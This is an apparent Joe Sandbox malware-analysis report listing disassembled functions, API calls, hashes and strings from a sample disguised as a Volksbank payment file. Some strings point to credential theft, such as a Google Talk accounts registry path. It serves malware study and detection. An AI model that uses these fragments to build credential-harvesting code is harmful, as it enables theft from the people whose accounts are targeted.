                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                                          • API String ID: 1366857005-1079885057
                                                                                                                                                                                                                                          • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                                                                          Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 435 40ba74 428->435 436 40ba6f-40ba72 428->436 429->422 429->423 430 40baa0-40bab3 call 407e30 437 40bab5-40bac1 430->437 438 40bafa-40bb09 SetCursor 430->438 439 40ba75-40ba76 call 40b5e5 435->439 436->439 441 40bac3-40bace 437->441 442 40bad8-40baf7 qsort 437->442 439->429 441->442 442->438 445->430 446->430 447->430 448->430 449->430
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                                                          • API String ID: 882979914-1578091866
                                                                                                                                                                                                                                          • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                                                          Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                            • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                            • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                                                          Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                                                          Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76940A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                                                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                                                                                                                                          • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                                          Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                                          • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                          • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                                          Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                                            • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3143880245-0
                                                                                                                                                                                                                                          • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                                          Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                                          Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D5C
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D7A
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D98
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408DA8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                                          • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                          • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                                          Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,76940A60,00407A43,00000001,?,00000000,76940A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3056473165-0
                                                                                                                                                                                                                                          • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                          • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                                                          Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                          • String ID: Arial
                                                                                                                                                                                                                                          • API String ID: 3853255127-493054409
                                                                                                                                                                                                                                          • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                          • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                                                                          Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                                                                                                                                          • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                                                          Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 145871493-0
                                                                                                                                                                                                                                          • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                                          Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4165544737-0
                                                                                                                                                                                                                                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                                          Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
